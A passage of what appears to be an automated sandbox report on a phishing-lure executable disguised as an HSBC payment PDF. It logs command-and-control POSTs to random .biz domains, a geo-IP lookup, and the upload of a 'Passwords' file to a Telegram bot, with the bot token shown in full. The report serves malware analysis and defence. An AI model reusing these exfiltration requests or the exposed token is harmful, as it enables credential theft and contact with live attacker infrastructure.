Data Ascii: t&uid=" + encodeURIComponent(uniqueTrackingID));} else if ((status.adult === false || status.adult == "false") && isAdult) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=nonadult&uid=" + encodeURICom
Dec 11, 2024 09:26:24.551563978 CET | 364 | OUT | GET /snsobwmcccpnrm?usid=25&utid=8132647334 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Host: ww12.przvgke.biz
Dec 11, 2024 09:26:25.057082891 CET | 825 | IN | HTTP/1.1 200 OK
Accept-Ch: viewport-width
Accept-Ch: dpr
Accept-Ch: device-memory
Accept-Ch: rtt
Accept-Ch: downlink
Accept-Ch: ect
Accept-Ch: ua
Accept-Ch: ua-full-version
Accept-Ch: ua-platform
Accept-Ch: ua-platform-version
Accept-Ch: ua-arch
Accept-Ch: ua-model
Accept-Ch: ua-mobile
Accept-Ch-Lifetime: 30
Content-Type: text/html; charset=UTF-8
Date: Wed, 11 Dec 2024 08:26:24 GMT
Server: Caddy
Server: nginx
Vary: Accept-Encoding
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_X+G6jDd1B8cElmIQlB675pfVulnMmKTHwlcR8HKLhayYnFRPpJnTgx1YqQj7SwujdpZmxbcj7U0WhOh+0Ep8eA==
X-Domain: przvgke.biz
X-Pcrew-Blocked-Reason:
X-Pcrew-Ip-Organization: CenturyLink
X-Subdomain: ww12
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49731 | 18.141.10.107 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:26:26.524910927 CET | 356 | OUT | POST /feiwbqpqckjc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 11, 2024 09:26:26.524929047 CET | 850 | OUT | Data Raw: 51 f6 89 f6 32 2a ac 98 46 03 00 00 c9 a2 b6 92 54 13 a8 f8 a7 e9 22 07 97 83 50 dd 4a 12 fc 67 37 83 fd f9 6d c2 73 00 ea 1f 6e f2 c5 3c d2 17 11 d7 67 84 a5 b7 43 38 c1 89 63 f3 79 42 47 2c 1d ec c5 aa 98 85 89 87 28 4d 40 05 dd 25 9d 22 7c b9
Data Ascii: Q2*FT"PJg7msn<gC8cyBG,(M@%"|RM]!ob8~g]I)O0Ky9%ImjB@e$leY-b M/%\/J|Mq2FLUL^]PG;M]z12VxM|;#f
Dec 11, 2024 09:26:28.610888004 CET | 412 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 11 Dec 2024 08:26:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=269b08293699a577a072ffff352ce405|8.46.123.175|1733905588|1733905588|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49742 | 82.112.184.197 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:26:30.448394060 CET | 348 | OUT | POST /dtxqcr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 11, 2024 09:26:30.448440075 CET | 850 | OUT | Data Raw: d1 d1 4a a6 ac fb de f3 46 03 00 00 e1 16 3f 45 c5 c8 27 f5 d2 5b 1f 84 73 36 dc ad 3b e4 3f 68 5f 88 ee 7b bd 06 f6 44 bd b4 71 41 f6 17 bb 11 11 a9 6a 30 66 ee c6 09 af 51 ee 51 e3 b6 fa c3 37 f5 b2 50 1d c4 1d 71 fc c0 fc ce ff 4e b9 8f 84 50
Data Ascii: JF?E'[s6;?h_{DqAj0fQQ7PqNP(:U=4`pdK)QzYj]UY3pi8(]vo9PML1]/lZbryHQLmaH26Sr1^9 78ZwC*"|fso+


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49792 | 82.112.184.197 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:26:52.879203081 CET | 355 | OUT | POST /kdexhblwxghmj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 11, 2024 09:26:52.879223108 CET | 850 | OUT | Data Raw: d6 11 7e 8b 57 4c cf d5 46 03 00 00 f7 e2 a2 53 9c a7 51 33 fe 46 f3 72 79 b6 be e6 f0 83 b0 8b f5 61 a6 4f f2 d2 76 80 27 7c 6c 58 b8 e1 d2 d4 16 a2 16 31 05 e0 0a a8 87 eb a0 3c a5 67 ad 64 f7 8f d1 ba 7c 7b 39 36 dd 79 71 ba 68 29 87 5b 04 f7
Data Ascii: ~WLFSQ3FryaOv'|lX1<gd|{96yqh)[wQW:)T|uP'8=?Gcc9QDMRX12`4x"g,<_0vev|e#t<Gg}l427f)(T]bC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49844 | 82.112.184.197 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:27:16.080837011 CET | 353 | OUT | POST /cfsmnhjm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 11, 2024 09:27:16.080857038 CET | 850 | OUT | Data Raw: 65 2c 53 16 1b 54 41 62 46 03 00 00 5a 65 16 b4 7b 32 c7 cf 0b 80 0e 70 4d b2 b5 11 18 1a 64 bc 37 5e b5 e3 1b 49 53 b6 7b fd 13 86 8d 9b 6e 4d 8f dd 46 4d 11 71 7c 0c e0 91 b8 85 35 4c b9 bb 99 4b e8 89 db e5 bb f7 68 08 38 e1 10 24 18 c9 e1 5f
Data Ascii: e,STAbFZe{2pMd7^IS{nMFMq|5LKh8$_`Wma"LOrbSGJ}_ItdMPfwT M{qVJi5SKbc6&BUuk^Ux8A3\$`~8_Z\Vg}c,q


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49895 | 82.112.184.197 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:27:38.123414993 CET | 346 | OUT | POST /o HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 11, 2024 09:27:38.132839918 CET | 850 | OUT | Data Raw: 70 e6 95 06 2a 84 91 ca 46 03 00 00 03 64 0e c4 8c 81 0f 26 d1 11 4f e0 7e 6f 7f ba 9e a2 e3 3f de 14 e3 c0 89 9b 4f 5e bd 72 35 e0 c2 7b ab fa 83 62 17 c9 9a 5f e5 5d 38 65 23 ae de 2e 8b 39 e0 6e 24 6e e6 f3 b1 73 1d 71 e1 ae ff ce 9e 99 0c aa
Data Ascii: p*Fd&O~o?O^r5{b_]8e#.9n$nsqzJkY&0r "9\N }S-UKv0F:u:0DDFr^ImBoBYsFq`dH@"<eRx bxFaf")w9|hf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49946 | 47.129.31.212 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:28:00.709965944 CET | 347 | OUT | POST /vtfq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 11, 2024 09:28:00.709983110 CET | 850 | OUT | Data Raw: 23 ed 5e 49 bf eb 2f be 46 03 00 00 e3 04 58 5c 9a e5 b0 3b b6 e5 bf ba 1e 12 c6 e6 fc 96 55 f2 16 95 2f d3 e9 45 31 67 87 2d 8d 88 a4 60 ec 6e 76 48 f5 1d dc 1c 0c 20 d6 bf 9f a2 93 61 47 18 a4 fd 7c 97 38 2e 6b d0 41 53 34 4e 62 8f 80 0a ef a8
Data Ascii: #^I/FX\;U/E1g-`nvH aG|8.kAS4Nb}WhQnUt.8~?#|7CwF#EGq2P;7Z5Cm.eJS8\3;+yf?W1h80Is/,(4-;t|1rLvXlB
Dec 11, 2024 09:28:02.771852016 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 11 Dec 2024 08:28:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=12f350b9bec4ba8e5b30ae20808e81af|8.46.123.175|1733905682|1733905682|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49952 | 13.251.16.150 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:28:04.372708082 CET | 344 | OUT | POST /pn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 11, 2024 09:28:04.372839928 CET | 850 | OUT | Data Raw: 09 4d 9b cf 89 4e 54 b6 46 03 00 00 05 14 fc fc 6b b4 a0 78 3c 49 3a f9 f7 32 c6 19 8b 02 bc b8 3c e5 d4 0f 09 4f 91 3c 20 59 35 7d f9 ff 21 e2 9c 77 48 61 78 c3 22 3f 03 56 88 9f 00 17 12 fb 63 b9 c2 77 04 16 d3 a6 9a 56 ba 0b 55 85 d5 cb a7 5b
Data Ascii: MNTFkx<I:2<O< Y5}!wHax"?VcwVU[y6P|OOvG/|W\l.E'IEQ7]XX\v~U(.)A?OFOKQD@(yjXtri@a6D_uw^q
Dec 11, 2024 09:28:06.443178892 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 11 Dec 2024 08:28:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6ac8f14eccc2f514944d2ec025e46dde|8.46.123.175|1733905686|1733905686|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49963 | 44.221.84.105 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:28:07.209919930 CET | 357 | OUT | POST /eglmpsrvxnyx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 11, 2024 09:28:07.209964037 CET | 850 | OUT | Data Raw: 9b c8 c0 0e 73 8c d7 df 46 03 00 00 72 46 11 01 31 91 72 d7 91 99 c7 45 88 86 3d 03 92 3f 1c dd 01 30 ba 49 d1 bc da 37 b6 a4 a6 55 97 e6 1f ea c3 00 7e f1 59 8e 80 b6 bc 43 f3 37 77 ec f1 85 00 8d 97 00 cb 37 e6 bd 88 37 61 2b 85 d3 27 ad 58 67
Data Ascii: sFrF1rE=?0I7U~YC7w77a+'Xg$^\ZN@b>|EL"p(BWY: DV0E>f7O=|(AwJ}?:-fM'MeDH7kn|I;wO;Oq\ji|X'1Oms?,
Dec 11, 2024 09:28:08.309787989 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 11 Dec 2024 08:28:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=56e256e8e8cd5447e37689be979e9ccb|8.46.123.175|1733905688|1733905688|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49964 | 18.141.10.107 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:28:09.271538973 CET | 349 | OUT | POST /lqpvpf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Dec 11, 2024 09:28:09.271564960 CET | 850 | OUT | Data Raw: 9b e6 af 86 de ef 5d 5e 46 03 00 00 d8 24 6a 61 2a 3e bb 46 d1 59 ae 2c 12 3c 2e a2 1f 56 39 8a c7 cc 85 23 a8 6f a2 0b 2b 13 6b ec 21 67 f0 ab 7f ce 63 ed 4b 74 bd ea b8 66 3b 9f bf f3 8e 43 61 44 8b 77 4e db e3 bc 0c ed c7 90 ab 59 ae 31 c4 cb
Data Ascii: ]^F$ja*>FY,<.V9#o+k!gcKtf;CaDwNY1W{*61.CAH4![-cOg*"7W@dNa&pD$U-yUtS;Jdfm"-l3:rn]{l
Dec 11, 2024 09:28:11.355875969 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 11 Dec 2024 08:28:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=83ab5ff6b435ed5e0b4df9f59e5e2547|8.46.123.175|1733905690|1733905690|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.549711172.67.177.1344437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-11 08:26:16 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-12-11 08:26:16 UTC881INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:16 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                              Age: 84899
                                                                                                                                                                              Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sY%2FOG7DrKx%2B2Yv7Ik2mtDvh9Bb0YQRzlj5oZfnjWRz6cgYsmnqKhZucLw75QXdfBZhsId8KRhPj%2BaMPui124KCHGr9l%2F%2FGO9hTNjl8lomoBfbAHcI%2FEMN2ADH9VIz7AG0qpTgJl4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f0416bdad8218b8-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1569&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1763285&cwnd=186&unsent_bytes=0&cid=f697564e67ac05dd&ts=458&x=0"
Timestamp:2024-12-11 08:26:16 UTC
Bytes transferred:362
Direction:IN
Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID:1
Source IP:192.168.2.5
Source Port:49716
Destination IP:149.154.167.220
Destination Port:443
PID:7188
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp:2024-12-11 08:26:23 UTC
Bytes transferred:296
Direction:OUT
Data:POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1
                                                                                                                                                                              Content-Type: multipart/form-data; boundary================8dd19939553a042
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Content-Length: 1090
                                                                                                                                                                              Connection: Keep-Alive
Timestamp:2024-12-11 08:26:23 UTC
Bytes transferred:1090
Direction:OUT
Data Ascii: --===============8dd19939553a042Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************

Timestamp:2024-12-11 08:26:24 UTC
Bytes transferred:388
Direction:IN
Data:HTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:24 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 516
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp:2024-12-11 08:26:24 UTC
Bytes transferred:516
Direction:IN
Data Ascii: {"ok":true,"result":{"message_id":1123,"from":{"id":7471415635,"is_bot":true,"first_name":"oluwamims","username":"oluwamimsBot"},"chat":{"id":1613755033,"first_name":"Mims","type":"private"},"date":1733905584,"document":{"file_name":"Userdata.txt","mime_t


                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:03:26:04
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:1'587'200 bytes
                                                                                                                                                                              MD5 hash:4BD5AB8C1D6EB0D7B601863A74471CF3
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:03:26:05
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:1'445'888 bytes
                                                                                                                                                                              MD5 hash:9244278F3A4B451378B09E3B314A4B1A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:03:26:05
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\alg.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'381'376 bytes
                                                                                                                                                                              MD5 hash:2AF371D31DE2620D08F24582BCC94F36
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:03:26:06
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                              Commandline:
                                                                                                                                                                              Imagebase:
                                                                                                                                                                              File size:138'056 bytes
                                                                                                                                                                              MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:03:26:06
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                              Commandline:
                                                                                                                                                                              Imagebase:
                                                                                                                                                                              File size:174'408 bytes
                                                                                                                                                                              MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:03:26:06
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                              Commandline:
                                                                                                                                                                              Imagebase:
                                                                                                                                                                              File size:154'952 bytes
                                                                                                                                                                              MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:03:26:06
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'348'608 bytes
                                                                                                                                                                              MD5 hash:FEBB8A1C8444E585D00E9798A241F535
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

Target ID:10
Start time:03:26:08
Start date:11/12/2024
Path:C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\fxssvc.exe
Imagebase:0x140000000
File size:1'242'624 bytes
MD5 hash:B19D2C88C8C42BA1F4C83060C439AAFE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:11
Start time:03:26:09
Start date:11/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:0x140000000
File size:2'354'176 bytes
MD5 hash:AB3EAE016DCC7F0026DB2D4EF2BCCB01
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:12
Start time:03:26:09
Start date:11/12/2024
Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:0x140000000
File size:1'512'448 bytes
MD5 hash:E7E89E8BD2CB902CA372DA1022670BE2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:13
Start time:03:26:10
Start date:11/12/2024
Path:C:\Windows\System32\msdtc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\msdtc.exe
Imagebase:0x140000000
File size:1'434'112 bytes
MD5 hash:AAA284FF086F56BEC322CDE13CE5989C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:14
Start time:03:26:10
Start date:11/12/2024
Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Imagebase:0x140000000
File size:1'391'616 bytes
MD5 hash:F3D51ACFF199999586D8F7FCE77371CB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:15
Start time:03:26:11
Start date:11/12/2024
Path:C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWow64\perfhost.exe
Imagebase:0x400000
File size:1'306'624 bytes
MD5 hash:A01D0D18438CEA05470B157B11E94B3F
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:16
Start time:03:26:11
Start date:11/12/2024
Path:C:\Windows\System32\Locator.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\locator.exe
Imagebase:0x140000000
File size:1'296'896 bytes
MD5 hash:27C76B862642ACB46AB7DEFBFD73BFA7
Has elevated privileges:true
Has administrator privileges:true
